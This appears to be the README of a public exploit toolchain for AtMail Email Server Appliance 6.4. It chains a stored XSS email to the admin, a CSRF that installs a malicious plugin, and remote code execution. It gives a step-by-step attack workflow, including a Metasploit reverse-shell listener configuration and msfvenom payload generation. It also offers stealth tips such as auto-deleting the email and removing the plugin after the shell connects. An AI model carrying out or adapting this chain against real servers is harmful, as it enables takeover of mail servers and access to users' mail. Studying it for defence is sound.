Atmail-exploit-toolchain
Atmail-exploit-toolchain copied to clipboard
AtMail Email Server Appliance 6.4 - Exploit toolchain (XSS > CSRF > RCE)
AtMail Email Server Appliance 6.4 - Exploit toolchain (XSS > CSRF > RCE)
[PacketStorm] [WLB-2020080010]
Disclaimer: this exploit toolchain was inspired by EDB-ID 20009.
Goal
The goal of this exploit toolchain is to replace EDB-ID 20009.
Pros of this toolchain over EDB-ID 20009 exploit:
- Simple to use
- Reusable
- Dynamically generated payloads
- Easily editable / hackable
- Clear code and plugin available
Cons of EDB-ID 20009 exploit:
- Not customizable (static hardcoded payloads)
- Complex to use (need to replace many hardcoded values and adapt the code to suite the target environment)
- Oneshot use (all values hardcoded)
- The plugin archive tgz is embedded as string (hex chars) so the plugin source code can't be easily read or modified
Requirements
- (Optional) Metasploit Framework (
msfvenom
for reverse shell generation) - tar (to generate the plugin archive)
- ruby (payloads preparation and XSS SMTP delivery)
- (Optional) A web server to deliver the XSS payload
- Knowing an Atmail admin email address (only admins can install a plugin)
- Passive interaction (the admin needs to trigger the email containing the XSS payload on the WebMail and to have a valid administration interface session running)
Install requirements on ArchLinux:
$ sudo pacman -S metasploit tar ruby
How it works
- Sending an email to the admin containing a XSS payload
- The XSS payload remotely load the JavaScript CSRF
- The CSRF install a plugin
- When installed the plugin execute a system command: the reverse shell
Exploit files:
-
config.yml
contains the toolchain configuration -
exploit.sh
the exploit wrapper that need to be executed -
xss_mail.rb
will send the email containing the XSS to the admin via Atmail SMTP server (unauthenticated). -
csrf_prepare.rb
will prepare the CSRF payload (setting the target and encoding the plugin archive) -
rce_prepare.rb
will prepare the RCE (generating the reverse shell and creating the plugin archive) -
csrf_plugin.js
the prepared CSRF payload -
noraj/
folder containing the uncompressed plugin architecture
Usage
The exploit toolchain requires only 2 manual steps:
- Edit
config.yml
- Launch
exploit.sh
But before launching the attack, a web server need to deliver the JavaScript CSRF file and a reverse shell listener need to be waiting the connection. So the attack will more looks like:
- Edit
config.yml
- Start a HTTP server that will deliver
csrf_plugin.js
- Start the reverse shell listener
- Launch
exploit.sh
Example of oneline HTTP server:
$ ruby -run -e httpd . -p 8000
Example of reverse shell listener:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run
Notes
- The RCE occurs only when the plugin is installed, if the reverse shell connection is lost, re-executing means re-installing the plugin. So the admin only needs to reload his mailbox.
- Red teamers could enhance the exploit to auto-remove the email once read and to remove the plugin once the reverse shell connection is established: less persistent but more stealth.
- msfvenom (MSF 5.0) only supports an IP address for LHOST, not a domain.
- As said in Requirements the admin needs to be connect on both the Webmail and the administration interface.
- Tested with ruby 2.7.